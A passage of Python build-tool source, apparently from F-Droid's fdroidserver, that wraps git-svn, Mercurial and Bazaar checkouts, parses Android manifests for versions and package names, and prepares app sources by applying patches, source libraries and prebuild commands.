cwd=self.local)\n if p.returncode != 0:\n raise VCSException(\"Git submodule update failed\", p.output)\n\n def _gettags(self):\n self.checkrepo()\n p = FDroidPopen(['git', 'tag'], cwd=self.local, output=False)\n return p.output.splitlines()\n\n tag_format = re.compile(r'tag: ([^),]*)')\n\n def latesttags(self):\n self.checkrepo()\n p = FDroidPopen(['git', 'log', '--tags',\n '--simplify-by-decoration', '--pretty=format:%d'],\n cwd=self.local, output=False)\n tags = []\n for line in p.output.splitlines():\n for tag in self.tag_format.findall(line):\n tags.append(tag)\n return tags\n\n\nclass vcs_gitsvn(vcs):\n\n def repotype(self):\n return 'git-svn'\n\n # If the local directory exists, but is somehow not a git repository, git\n # will traverse up the directory tree until it finds one that is (i.e.\n # fdroidserver) and then we'll proceed to destroy it! 
This is called as\n # a safety check.\n def checkrepo(self):\n p = FDroidPopen(['git', 'rev-parse', '--show-toplevel'], cwd=self.local, output=False)\n result = p.output.rstrip()\n if not result.endswith(self.local):\n raise VCSException('Repository mismatch')\n\n def gotorevisionx(self, rev):\n if not os.path.exists(self.local):\n # Brand new checkout\n gitsvn_args = ['git', 'svn', 'clone']\n if ';' in self.remote:\n remote_split = self.remote.split(';')\n for i in remote_split[1:]:\n if i.startswith('trunk='):\n gitsvn_args.extend(['-T', i[6:]])\n elif i.startswith('tags='):\n gitsvn_args.extend(['-t', i[5:]])\n elif i.startswith('branches='):\n gitsvn_args.extend(['-b', i[9:]])\n gitsvn_args.extend([remote_split[0], self.local])\n p = FDroidPopen(gitsvn_args, output=False)\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Git svn clone failed\", p.output)\n else:\n gitsvn_args.extend([self.remote, self.local])\n p = FDroidPopen(gitsvn_args, output=False)\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Git svn clone failed\", p.output)\n self.checkrepo()\n else:\n self.checkrepo()\n # Discard any working tree changes\n p = FDroidPopen(['git', 'reset', '--hard'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git reset failed\", p.output)\n # Remove untracked files now, in case they're tracked in the target\n # revision (it happens!)\n p = FDroidPopen(['git', 'clean', '-dffx'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git clean failed\", p.output)\n if not self.refreshed:\n # Get new commits, branches and tags from repo\n p = FDroidPopen(['git', 'svn', 'fetch'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git svn fetch failed\")\n p = FDroidPopen(['git', 'svn', 'rebase'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git svn rebase failed\", p.output)\n self.refreshed = True\n\n rev = rev or 'master'\n if rev:\n nospaces_rev = rev.replace(' ', '%20')\n # Try finding a svn tag\n for treeish in ['origin/', '']:\n p = FDroidPopen(['git', 'checkout', treeish + 'tags/' + nospaces_rev], cwd=self.local, output=False)\n if p.returncode == 0:\n break\n if p.returncode != 0:\n # No tag found, normal svn rev translation\n # Translate svn rev into git format\n rev_split = rev.split('/')\n\n p = None\n for treeish in ['origin/', '']:\n if len(rev_split) > 1:\n treeish += rev_split[0]\n svn_rev = rev_split[1]\n\n else:\n # if no branch is specified, then assume trunk (i.e. 
'master' branch):\n treeish += 'master'\n svn_rev = rev\n\n svn_rev = svn_rev if svn_rev[0] == 'r' else 'r' + svn_rev\n\n p = FDroidPopen(['git', 'svn', 'find-rev', '--before', svn_rev, treeish], cwd=self.local, output=False)\n git_rev = p.output.rstrip()\n\n if p.returncode == 0 and git_rev:\n break\n\n if p.returncode != 0 or not git_rev:\n # Try a plain git checkout as a last resort\n p = FDroidPopen(['git', 'checkout', rev], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"No git treeish found and direct git checkout of '%s' failed\" % rev, p.output)\n else:\n # Check out the git rev equivalent to the svn rev\n p = FDroidPopen(['git', 'checkout', git_rev], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git checkout of '%s' failed\" % rev, p.output)\n\n # Get rid of any uncontrolled files left behind\n p = FDroidPopen(['git', 'clean', '-dffx'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Git clean failed\", p.output)\n\n def _gettags(self):\n self.checkrepo()\n for treeish in ['origin/', '']:\n d = os.path.join(self.local, '.git', 'svn', 'refs', 'remotes', treeish, 'tags')\n if os.path.isdir(d):\n return os.listdir(d)\n\n def getref(self):\n self.checkrepo()\n p = FDroidPopen(['git', 'svn', 'find-rev', 'HEAD'], cwd=self.local, output=False)\n if p.returncode != 0:\n return None\n return p.output.strip()\n\n\nclass vcs_hg(vcs):\n\n def repotype(self):\n return 'hg'\n\n def gotorevisionx(self, rev):\n if not os.path.exists(self.local):\n p = FDroidPopen(['hg', 'clone', self.remote, self.local], output=False)\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Hg clone failed\", p.output)\n else:\n p = FDroidPopen(['hg', 'status', '-uS'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Hg status failed\", p.output)\n for line in p.output.splitlines():\n if not line.startswith('? 
'):\n raise VCSException(\"Unexpected output from hg status -uS: \" + line)\n FDroidPopen(['rm', '-rf', line[2:]], cwd=self.local, output=False)\n if not self.refreshed:\n p = FDroidPopen(['hg', 'pull'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Hg pull failed\", p.output)\n self.refreshed = True\n\n rev = rev or 'default'\n if not rev:\n return\n p = FDroidPopen(['hg', 'update', '-C', rev], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Hg checkout of '%s' failed\" % rev, p.output)\n p = FDroidPopen(['hg', 'purge', '--all'], cwd=self.local, output=False)\n # Also delete untracked files, we have to enable purge extension for that:\n if \"'purge' is provided by the following extension\" in p.output:\n with open(os.path.join(self.local, '.hg', 'hgrc'), \"a\") as myfile:\n myfile.write(\"\\n[extensions]\\nhgext.purge=\\n\")\n p = FDroidPopen(['hg', 'purge', '--all'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"HG purge failed\", p.output)\n elif p.returncode != 0:\n raise VCSException(\"HG purge failed\", p.output)\n\n def _gettags(self):\n p = FDroidPopen(['hg', 'tags', '-q'], cwd=self.local, output=False)\n return p.output.splitlines()[1:]\n\n\nclass vcs_bzr(vcs):\n\n def repotype(self):\n return 'bzr'\n\n def gotorevisionx(self, rev):\n if not os.path.exists(self.local):\n p = FDroidPopen(['bzr', 'branch', self.remote, self.local], output=False)\n if p.returncode != 0:\n self.clone_failed = True\n raise VCSException(\"Bzr branch failed\", p.output)\n else:\n p = FDroidPopen(['bzr', 'clean-tree', '--force', '--unknown', '--ignored'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Bzr revert failed\", p.output)\n if not self.refreshed:\n p = FDroidPopen(['bzr', 'pull'], cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Bzr update failed\", p.output)\n self.refreshed = True\n\n revargs = list(['-r', rev] if rev else [])\n p = FDroidPopen(['bzr', 'revert'] + revargs, cwd=self.local, output=False)\n if p.returncode != 0:\n raise VCSException(\"Bzr revert of '%s' failed\" % rev, p.output)\n\n def _gettags(self):\n p = FDroidPopen(['bzr', 'tags'], cwd=self.local, output=False)\n return [tag.split(' ')[0].strip() for tag in\n p.output.splitlines()]\n\n\ndef unescape_string(string):\n if len(string) < 2:\n return string\n if string[0] == '\"' and string[-1] == '\"':\n return string[1:-1]\n\n return string.replace(\"\\\\'\", \"'\")\n\n\ndef retrieve_string(app_dir, string, xmlfiles=None):\n\n if not string.startswith('@string/'):\n return unescape_string(string)\n\n if xmlfiles is None:\n xmlfiles = []\n for res_dir in [\n os.path.join(app_dir, 'res'),\n os.path.join(app_dir, 'src', 'main', 'res'),\n ]:\n for r, d, f in os.walk(res_dir):\n if os.path.basename(r) == 'values':\n xmlfiles += [os.path.join(r, x) for x in f if x.endswith('.xml')]\n\n name = string[len('@string/'):]\n\n def element_content(element):\n if element.text is None:\n return \"\"\n s = XMLElementTree.tostring(element, encoding='utf-8', method='text')\n return s.decode('utf-8').strip()\n\n for path in xmlfiles:\n if not os.path.isfile(path):\n continue\n xml = parse_xml(path)\n element = xml.find('string[@name=\"' + name + '\"]')\n if element is not None:\n content = element_content(element)\n return retrieve_string(app_dir, content, xmlfiles)\n\n return ''\n\n\ndef retrieve_string_singleline(app_dir, string, xmlfiles=None):\n return retrieve_string(app_dir, string, 
xmlfiles).replace('\\n', ' ').strip()\n\n\n# Return list of existing files that will be used to find the highest vercode\ndef manifest_paths(app_dir, flavours):\n\n possible_manifests = \\\n [os.path.join(app_dir, 'AndroidManifest.xml'),\n os.path.join(app_dir, 'src', 'main', 'AndroidManifest.xml'),\n os.path.join(app_dir, 'src', 'AndroidManifest.xml'),\n os.path.join(app_dir, 'build.gradle')]\n\n for flavour in flavours:\n if flavour == 'yes':\n continue\n possible_manifests.append(\n os.path.join(app_dir, 'src', flavour, 'AndroidManifest.xml'))\n\n return [path for path in possible_manifests if os.path.isfile(path)]\n\n\n# Retrieve the package name. Returns the name, or None if not found.\ndef fetch_real_name(app_dir, flavours):\n for path in manifest_paths(app_dir, flavours):\n if not has_extension(path, 'xml') or not os.path.isfile(path):\n continue\n logging.debug(\"fetch_real_name: Checking manifest at \" + path)\n xml = parse_xml(path)\n app = xml.find('application')\n if app is None:\n continue\n if \"{http://schemas.android.com/apk/res/android}label\" not in app.attrib:\n continue\n label = app.attrib[\"{http://schemas.android.com/apk/res/android}label\"]\n result = retrieve_string_singleline(app_dir, label)\n if result:\n result = result.strip()\n return result\n return None\n\n\ndef get_library_references(root_dir):\n libraries = []\n proppath = os.path.join(root_dir, 'project.properties')\n if not os.path.isfile(proppath):\n return libraries\n with open(proppath, 'r', encoding='iso-8859-1') as f:\n for line in f:\n if not line.startswith('android.library.reference.'):\n continue\n path = line.split('=')[1].strip()\n relpath = os.path.join(root_dir, path)\n if not os.path.isdir(relpath):\n continue\n logging.debug(\"Found subproject at %s\" % path)\n libraries.append(path)\n return libraries\n\n\ndef ant_subprojects(root_dir):\n subprojects = get_library_references(root_dir)\n for subpath in subprojects:\n subrelpath = os.path.join(root_dir, subpath)\n for p in get_library_references(subrelpath):\n relp = os.path.normpath(os.path.join(subpath, p))\n if relp not in subprojects:\n subprojects.insert(0, relp)\n return subprojects\n\n\ndef remove_debuggable_flags(root_dir):\n # Remove forced debuggable flags\n logging.debug(\"Removing debuggable flags from %s\" % root_dir)\n for root, dirs, files in os.walk(root_dir):\n if 'AndroidManifest.xml' in files:\n regsub_file(r'android:debuggable=\"[^\"]*\"',\n '',\n os.path.join(root, 'AndroidManifest.xml'))\n\n\nvcsearch_g = re.compile(r'.*versionCode *=* *[\"\\']*([0-9]+)[\"\\']*').search\nvnsearch_g = re.compile(r'.*versionName *=* *([\"\\'])((?:(?=(\\\\?))\\3.)*?)\\1.*').search\npsearch_g = re.compile(r'.*(packageName|applicationId) *=* *[\"\\']([^\"]+)[\"\\'].*').search\n\n\ndef app_matches_packagename(app, package):\n if not package:\n return False\n appid = app.UpdateCheckName or app.id\n if appid is None or appid == \"Ignore\":\n return True\n return appid == package\n\n\n# Extract some information from the AndroidManifest.xml at the given path.\n# Returns (version, vercode, package), any or all of which might be None.\n# All values returned are strings.\ndef parse_androidmanifests(paths, app):\n\n ignoreversions = app.UpdateCheckIgnore\n ignoresearch = re.compile(ignoreversions).search if ignoreversions else None\n\n if not paths:\n return (None, None, None)\n\n max_version = None\n max_vercode = None\n max_package = None\n\n for path in paths:\n\n if not os.path.isfile(path):\n continue\n\n logging.debug(\"Parsing manifest at 
{0}\".format(path))\n gradle = has_extension(path, 'gradle')\n version = None\n vercode = None\n package = None\n\n if gradle:\n with open(path, 'r') as f:\n for line in f:\n if gradle_comment.match(line):\n continue\n # Grab first occurence of each to avoid running into\n # alternative flavours and builds.\n if not package:\n matches = psearch_g(line)\n if matches:\n s = matches.group(2)\n if app_matches_packagename(app, s):\n package = s\n if not version:\n matches = vnsearch_g(line)\n if matches:\n version = matches.group(2)\n if not vercode:\n matches = vcsearch_g(line)\n if matches:\n vercode = matches.group(1)\n else:\n try:\n xml = parse_xml(path)\n if \"package\" in xml.attrib:\n s = xml.attrib[\"package\"]\n if app_matches_packagename(app, s):\n package = s\n if \"{http://schemas.android.com/apk/res/android}versionName\" in xml.attrib:\n version = xml.attrib[\"{http://schemas.android.com/apk/res/android}versionName\"]\n base_dir = os.path.dirname(path)\n version = retrieve_string_singleline(base_dir, version)\n if \"{http://schemas.android.com/apk/res/android}versionCode\" in xml.attrib:\n a = xml.attrib[\"{http://schemas.android.com/apk/res/android}versionCode\"]\n if string_is_integer(a):\n vercode = a\n except Exception:\n logging.warning(\"Problem with xml at {0}\".format(path))\n\n # Remember package name, may be defined separately from version+vercode\n if package is None:\n package = max_package\n\n logging.debug(\"..got package={0}, version={1}, vercode={2}\"\n .format(package, version, vercode))\n\n # Always grab the package name and version name in case they are not\n # together with the highest version code\n if max_package is None and package is not None:\n max_package = package\n if max_version is None and version is not None:\n max_version = version\n\n if max_vercode is None or (vercode is not None and vercode > max_vercode):\n if not ignoresearch or not ignoresearch(version):\n if version is not None:\n max_version = version\n if vercode is not None:\n max_vercode = vercode\n if package is not None:\n max_package = package\n else:\n max_version = \"Ignore\"\n\n if max_version is None:\n max_version = \"Unknown\"\n\n if max_package and not is_valid_package_name(max_package):\n raise FDroidException(\"Invalid package name {0}\".format(max_package))\n\n return (max_version, max_vercode, max_package)\n\n\ndef is_valid_package_name(name):\n return re.match(\"[A-Za-z_][A-Za-z_0-9.]+$\", name)\n\n\nclass FDroidException(Exception):\n\n def __init__(self, value, detail=None):\n self.value = value\n self.detail = detail\n\n def shortened_detail(self):\n if len(self.detail) < 16000:\n return self.detail\n return '[...]\\n' + self.detail[-16000:]\n\n def get_wikitext(self):\n ret = repr(self.value) + \"\\n\"\n if self.detail:\n ret += \"=detail=\\n\"\n ret += \"<pre>\\n\" + self.shortened_detail() + \"</pre>\\n\"\n return ret\n\n def __str__(self):\n ret = self.value\n if self.detail:\n ret += \"\\n==== detail begin ====\\n%s\\n==== detail end ====\" % self.detail.strip()\n return ret\n\n\nclass VCSException(FDroidException):\n pass\n\n\nclass BuildException(FDroidException):\n pass\n\n\n# Get the specified source library.\n# Returns the path to it. Normally this is the path to be used when referencing\n# it, which may be a subdirectory of the actual project. 
If you want the base\n# directory of the project, pass 'basepath=True'.\ndef getsrclib(spec, srclib_dir, subdir=None, basepath=False,\n raw=False, prepare=True, preponly=False, refresh=True,\n build=None):\n\n number = None\n subdir = None\n if raw:\n name = spec\n ref = None\n else:\n name, ref = spec.split('@')\n if ':' in name:\n number, name = name.split(':', 1)\n if '/' in name:\n name, subdir = name.split('/', 1)\n\n if name not in fdroidserver.metadata.srclibs:\n raise VCSException('srclib ' + name + ' not found.')\n\n srclib = fdroidserver.metadata.srclibs[name]\n\n sdir = os.path.join(srclib_dir, name)\n\n if not preponly:\n vcs = getvcs(srclib[\"Repo Type\"], srclib[\"Repo\"], sdir)\n vcs.srclib = (name, number, sdir)\n if ref:\n vcs.gotorevision(ref, refresh)\n\n if raw:\n return vcs\n\n libdir = None\n if subdir:\n libdir = os.path.join(sdir, subdir)\n elif srclib[\"Subdir\"]:\n for subdir in srclib[\"Subdir\"]:\n libdir_candidate = os.path.join(sdir, subdir)\n if os.path.exists(libdir_candidate):\n libdir = libdir_candidate\n break\n\n if libdir is None:\n libdir = sdir\n\n remove_signing_keys(sdir)\n remove_debuggable_flags(sdir)\n\n if prepare:\n\n if srclib[\"Prepare\"]:\n cmd = replace_config_vars(srclib[\"Prepare\"], build)\n\n p = FDroidPopen(['bash', '-x', '-c', cmd], cwd=libdir)\n if p.returncode != 0:\n raise BuildException(\"Error running prepare command for srclib %s\"\n % name, p.output)\n\n if basepath:\n libdir = sdir\n\n return (name, number, libdir)\n\ngradle_version_regex = re.compile(r\"[^/]*'com\\.android\\.tools\\.build:gradle:([^\\.]+\\.[^\\.]+).*'.*\")\n\n\n# Prepare the source code for a particular build\n# 'vcs' - the appropriate vcs object for the application\n# 'app' - the application details from the metadata\n# 'build' - the build details from the metadata\n# 'build_dir' - the path to the build directory, usually\n# 'build/app.id'\n# 'srclib_dir' - the path to the source libraries directory, usually\n# 'build/srclib'\n# 'extlib_dir' - the path to the external libraries directory, usually\n# 'build/extlib'\n# Returns the (root, srclibpaths) where:\n# 'root' is the root directory, which may be the same as 'build_dir' or may\n# be a subdirectory of it.\n# 'srclibpaths' is information on the srclibs being used\ndef prepare_source(vcs, app, build, build_dir, srclib_dir, extlib_dir, onserver=False, refresh=True):\n\n # Optionally, the actual app source can be in a subdirectory\n if build.subdir:\n root_dir = os.path.join(build_dir, build.subdir)\n else:\n root_dir = build_dir\n\n # Get a working copy of the right revision\n logging.info(\"Getting source for revision \" + build.commit)\n vcs.gotorevision(build.commit, refresh)\n\n # Initialise submodules if required\n if build.submodules:\n logging.info(\"Initialising submodules\")\n vcs.initsubmodules()\n\n # Check that a subdir (if we're using one) exists. 
This has to happen\n # after the checkout, since it might not exist elsewhere\n if not os.path.exists(root_dir):\n raise BuildException('Missing subdir ' + root_dir)\n\n # Run an init command if one is required\n if build.init:\n cmd = replace_config_vars(build.init, build)\n logging.info(\"Running 'init' commands in %s\" % root_dir)\n\n p = FDroidPopen(['bash', '-x', '-c', cmd], cwd=root_dir)\n if p.returncode != 0:\n raise BuildException(\"Error running init command for %s:%s\" %\n (app.id, build.version), p.output)\n\n # Apply patches if any\n if build.patch:\n logging.info(\"Applying patches\")\n for patch in build.patch:\n patch = patch.strip()\n logging.info(\"Applying \" + patch)\n patch_path = os.path.join('metadata', app.id, patch)\n p = FDroidPopen(['patch', '-p1', '-i', os.path.abspath(patch_path)], cwd=build_dir)\n if p.returncode != 0:\n raise BuildException(\"Failed to apply patch %s\" % patch_path)\n\n # Get required source libraries\n srclibpaths = []\n if build.srclibs:\n logging.info(\"Collecting source libraries\")\n for lib in build.srclibs:\n srclibpaths.append(getsrclib(lib, srclib_dir, build, preponly=onserver,\n refresh=refresh, build=build))\n\n for name, number, libpath in srclibpaths:\n place_srclib(root_dir, int(number) if number else None, libpath)\n\n basesrclib = vcs.getsrclib()\n # If one was used for the main source, add that too.\n if basesrclib:\n srclibpaths.append(basesrclib)\n\n # Update the local.properties file\n localprops = [os.path.join(build_dir, 'local.properties')]\n if build.subdir:\n parts = build.subdir.split(os.sep)\n cur = build_dir\n for d in parts:\n cur = os.path.join(cur, d)\n localprops += [os.path.join(cur, 'local.properties')]\n for path in localprops:\n props = \"\"\n if os.path.isfile(path):\n logging.info(\"Updating local.properties file at %s\" % path)\n with open(path, 'r', encoding='iso-8859-1') as f:\n props += f.read()\n props += '\\n'\n else:\n logging.info(\"Creating local.properties file at %s\" % path)\n # Fix old-fashioned 'sdk-location' by copying\n # from sdk.dir, if necessary\n if build.oldsdkloc:\n sdkloc = re.match(r\".*^sdk.dir=(\\S+)$.*\", props,\n re.S | re.M).group(1)\n props += \"sdk-location=%s\\n\" % sdkloc\n else:\n props += \"sdk.dir=%s\\n\" % config['sdk_path']\n props += \"sdk-location=%s\\n\" % config['sdk_path']\n ndk_path = build.ndk_path()\n # if for any reason the path isn't valid or the directory\n # doesn't exist, some versions of Gradle will error with a\n # cryptic message (even if the NDK is not even necessary).\n # https://gitlab.com/fdroid/fdroidserver/issues/171\n if ndk_path and os.path.exists(ndk_path):\n # Add ndk location\n props += \"ndk.dir=%s\\n\" % ndk_path\n props += \"ndk-location=%s\\n\" % ndk_path\n # Add java.encoding if necessary\n if build.encoding:\n props += \"java.encoding=%s\\n\" % build.encoding\n with open(path, 'w', encoding='iso-8859-1') as f:\n f.write(props)\n\n flavours = []\n if build.build_method() == 'gradle':\n flavours = build.gradle\n\n if build.target:\n n = build.target.split('-')[1]\n regsub_file(r'compileSdkVersion[ =]+[0-9]+',\n r'compileSdkVersion %s' % n,\n os.path.join(root_dir, 'build.gradle'))\n\n # Remove forced debuggable flags\n remove_debuggable_flags(root_dir)\n\n # Insert version code and number into the manifest if necessary\n if build.forceversion:\n logging.info(\"Changing the version name\")\n for path in manifest_paths(root_dir, flavours):\n if not os.path.isfile(path):\n continue\n if has_extension(path, 'xml'):\n 
regsub_file(r'android:versionName=\"[^\"]*\"',\n r'android:versionName=\"%s\"' % build.version,\n path)\n elif has_extension(path, 'gradle'):\n regsub_file(r\"\"\"(\\s*)versionName[\\s'\"=]+.*\"\"\",\n r\"\"\"\\1versionName '%s'\"\"\" % build.version,\n path)\n\n if build.forcevercode:\n logging.info(\"Changing the version code\")\n for path in manifest_paths(root_dir, flavours):\n if not os.path.isfile(path):\n continue\n if has_extension(path, 'xml'):\n regsub_file(r'android:versionCode=\"[^\"]*\"',\n r'android:versionCode=\"%s\"' % build.vercode,\n path)\n elif has_extension(path, 'gradle'):\n regsub_file(r'versionCode[ =]+[0-9]+',\n r'versionCode %s' % build.vercode,\n path)\n\n # Delete unwanted files\n if build.rm:\n logging.info(\"Removing specified files\")\n for part in getpaths(build_dir, build.rm):\n dest = os.path.join(build_dir, part)\n logging.info(\"Removing {0}\".format(part))\n if os.path.lexists(dest):\n if os.path.islink(dest):\n FDroidPopen(['unlink', dest], output=False)\n else:\n FDroidPopen(['rm', '-rf', dest], output=False)\n else:\n logging.info(\"...but it didn't exist\")\n\n remove_signing_keys(build_dir)\n\n # Add required external libraries\n if build.extlibs:\n logging.info(\"Collecting prebuilt libraries\")\n libsdir = os.path.join(root_dir, 'libs')\n if not os.path.exists(libsdir):\n os.mkdir(libsdir)\n for lib in build.extlibs:\n lib = lib.strip()\n logging.info(\"...installing extlib {0}\".format(lib))\n libf = os.path.basename(lib)\n libsrc = os.path.join(extlib_dir, lib)\n if not os.path.exists(libsrc):\n raise BuildException(\"Missing extlib file {0}\".format(libsrc))\n shutil.copyfile(libsrc, os.path.join(libsdir, libf))\n\n # Run a pre-build command if one is required\n if build.prebuild:\n logging.info(\"Running 'prebuild' commands in %s\" % root_dir)\n\n cmd = replace_config_vars(build.prebuild, build)\n\n # Substitute source library paths into prebuild commands\n for name, number, libpath in srclibpaths:\n libpath = os.path.relpath(libpath, root_dir)\n cmd = cmd.replace('$$' + name + '$$', libpath)\n\n p = FDroidPopen(['bash', '-x', '-c', cmd], cwd=root_dir)\n if p.returncode != 0:\n raise BuildException(\"Error running prebuild command for %s:%s\" %\n (app.id, build.version), p.output)\n\n # Generate (or update) the ant build file, build.xml...\n if build.build_method() == 'ant' and build.update != ['no']:\n parms = ['android', 'update', 'lib-project']\n lparms = ['android', 'update', 'project']\n\n if build.target:\n parms += ['-t', build.target]\n lparms += ['-t', build.target]\n if build.update:\n update_dirs = build.update\n else:\n update_dirs = ant_subprojects(root_dir) + ['.']\n\n for d in update_dirs:\n subdir = os.path.join(root_dir, d)\n if d == '.':\n logging.debug(\"Updating main project\")\n cmd = parms + ['-p', d]\n else:\n logging.debug(\"Updating subproject %s\" % d)\n cmd = lparms + ['-p', d]\n p = SdkToolsPopen(cmd, cwd=root_dir)\n # Check to see whether an error was returned without a proper exit\n # code (this is the case for the 'no target set or target invalid'\n # error)\n if p.returncode != 0 or p.output.startswith(\"Error: \"):\n raise BuildException(\"Failed to update project at %s\" % d, p.output)\n # Clean update dirs via ant\n if d != '.':\n logging.info(\"Cleaning subproject %s\" % d)\n p = FDroidPopen(['ant', 'clean'], cwd=subdir)\n\n return (root_dir, srclibpaths)\n\n\n# Extend via globbing the paths from a field and return them as a map from\n# original path to resulting paths\ndef getpaths_map(build_dir, 
globpaths):\n paths = dict()\n for p in globpaths:\n p = p.strip()\n full_path = os.path.join(build_dir, p)\n full_path = os.path.normpath(full_path)\n paths[p] = [r[len(build_dir) + 1:] for r in glob.glob(full_path)]\n if not paths[p]:\n raise FDroidException(\"glob path '%s' did not match any files/dirs\" % p)\n return paths\n\n\n# Extend via globbing the paths from a field and return them as a set\ndef getpaths(build_dir, globpaths):\n paths_map = getpaths_map(build_dir, globpaths)\n paths = set()\n for k, v in paths_map.items():\n for p in v:\n paths.add(p)\n return paths\n\n\ndef natural_key(s):\n return [int(sp) if sp.isdigit() else sp for sp in re.split(r'(\\d+)', s)]\n\n\nclass KnownApks:\n\n def __init__(self):\n self.path = os.path.join('stats', 'known_apks.txt')\n self.apks = {}\n if os.path.isfile(self.path):\n with open(self.path, 'r', encoding='utf8') as f:\n for line in f:\n t = line.rstrip().split(' ')\n if len(t) == 2:\n self.apks[t[0]] = (t[1], None)\n else:\n self.apks[t[0]] = (t[1], time.strptime(t[2], '%Y-%m-%d'))\n self.changed = False\n\n def writeifchanged(self):\n if not self.changed:\n return\n\n if not os.path.exists('stats'):\n os.mkdir('stats')\n\n lst = []\n for apk, app in self.apks.items():\n appid, added = app\n line = apk + ' ' + appid\n if added:\n line += ' ' + time.strftime('%Y-%m-%d', added)\n lst.append(line)\n\n with open(self.path, 'w', encoding='utf8') as f:\n for line in sorted(lst, key=natural_key):\n f.write(line + '\\n')\n\n # Record an apk (if it's new, otherwise does nothing)\n # Returns the date it was added.\n def recordapk(self, apk, app, default_date=None):\n if apk not in self.apks:\n if default_date is None:\n default_date = time.gmtime(time.time())\n self.apks[apk] = (app, default_date)\n self.changed = True\n _, added = self.apks[apk]\n return added\n\n # Look up information - given the 'apkname', returns (app id, date added/None).\n # Or returns None for an unknown apk.\n def getapp(self, apkname):\n if apkname in self.apks:\n return self.apks[apkname]\n return None\n\n # Get the most recent 'num' apps added to the repo, as a list of package ids\n # with the most recent first.\n def getlatest(self, num):\n apps = {}\n for apk, app in self.apks.items():\n appid, added = app\n if added:\n if appid in apps:\n if apps[appid] > added:\n apps[appid] = added\n else:\n apps[appid] = added\n sortedapps = sorted(apps.items(), key=operator.itemgetter(1))[-num:]\n lst = [app for app, _ in sortedapps]\n lst.reverse()\n return lst\n\n\ndef isApkDebuggable(apkfile, config):\n \"\"\"Returns True if the given apk file is debuggable\n\n :param apkfile: full path to the apk to check\"\"\"\n\n p = SdkToolsPopen(['aapt', 'dump', 'xmltree', apkfile, 'AndroidManifest.xml'],\n output=False)\n if p.returncode != 0:\n logging.critical(\"Failed to get apk manifest information\")\n sys.exit(1)\n for line in p.output.splitlines():\n if 'android:debuggable' in line and not line.endswith('0x0'):\n return True\n return False\n\n\nclass PopenResult:\n def __init__(self):\n self.returncode = None\n self.output = None\n\n\ndef SdkToolsPopen(commands, cwd=None, output=True):\n cmd = commands[0]\n if cmd not in config:\n config[cmd] = find_sdk_tools_cmd(commands[0])\n abscmd = config[cmd]\n if abscmd is None:\n logging.critical(\"Could not find '%s' on your system\" % cmd)\n sys.exit(1)\n return FDroidPopen([abscmd] + commands[1:],\n cwd=cwd, output=output)\n\n\ndef FDroidPopenBytes(commands, cwd=None, output=True, stderr_to_stdout=True):\n \"\"\"\n Run a command and 
capture the possibly huge output as bytes.\n\n :param commands: command and argument list like in subprocess.Popen\n :param cwd: optionally specifies a working directory\n :returns: A PopenResult.\n \"\"\"\n\n global env\n if env is None:\n set_FDroidPopen_env()\n\n if cwd:\n cwd = os.path.normpath(cwd)\n logging.debug(\"Directory: %s\" % cwd)\n logging.debug(\"> %s\" % ' '.join(commands))\n\n stderr_param = subprocess.STDOUT if stderr_to_stdout else subprocess.PIPE\n result = PopenResult()\n p = None\n try:\n p = subprocess.Popen(commands, cwd=cwd, shell=False, env=env,\n stdout=subprocess.PIPE, stderr=stderr_param)\n except OSError as e:\n raise BuildException(\"OSError while trying to execute \" +\n ' '.join(commands) + ': ' + str(e))\n\n if not stderr_to_stdout and options.verbose:\n stderr_queue = Queue()\n stderr_reader = AsynchronousFileReader(p.stderr, stderr_queue)\n\n while not stderr_reader.eof():\n while not stderr_queue.empty():\n line = stderr_queue.get()\n sys.stderr.buffer.write(line)\n sys.stderr.flush()\n\n time.sleep(0.1)\n\n stdout_queue = Queue()\n stdout_reader = AsynchronousFileReader(p.stdout, stdout_queue)\n buf = io.BytesIO()\n\n # Check the queue for output (until there is no more to get)\n while not stdout_reader.eof():\n while not stdout_queue.empty():\n line = stdout_queue.get()\n if output and options.verbose:\n # Output directly to console\n sys.stderr.buffer.write(line)\n sys.stderr.flush()\n buf.write(line)\n\n time.sleep(0.1)\n\n result.returncode = p.wait()\n result.output = buf.getvalue()\n buf.close()\n return result\n\n\ndef FDroidPopen(commands, cwd=None, output=True, stderr_to_stdout=True):\n \"\"\"\n Run a command and capture the possibly huge output as a str.\n\n :param commands: command and argument list like in subprocess.Popen\n :param cwd: optionally specifies a working directory\n :returns: A PopenResult.\n \"\"\"\n result = FDroidPopenBytes(commands, cwd, output, stderr_to_stdout)\n result.output = result.output.decode('utf-8')\n return result\n\n\ngradle_comment = re.compile(r'[ ]*//')\ngradle_signing_configs = re.compile(r'^[\\t ]*signingConfigs[ \\t]*{[ \\t]*$')\ngradle_line_matches = [\n re.compile(r'^[\\t ]*signingConfig [^ ]*$'),\n re.compile(r'.*android\\.signingConfigs\\.[^{]*$'),\n re.compile(r'.*\\.readLine\\(.*'),\n]\n\n\ndef remove_signing_keys(build_dir):\n for root, dirs, files in os.walk(build_dir):\n if 'build.gradle' in files:\n path = os.path.join(root, 'build.gradle')\n\n with open(path, \"r\", encoding='utf8') as o:\n lines = o.readlines()\n\n changed = False\n\n opened = 0\n i = 0\n with open(path, \"w\", encoding='utf8') as o:\n while i < len(lines):\n line = lines[i]\n i += 1\n while line.endswith('\\\\\\n'):\n line = line.rstrip('\\\\\\n') + lines[i]\n i += 1\n\n if gradle_comment.match(line):\n o.write(line)\n continue\n\n if opened > 0:\n opened += line.count('{')\n opened -= line.count('}')\n continue\n\n if gradle_signing_configs.match(line):\n changed = True\n opened += 1\n continue\n\n if any(s.match(line) for s in 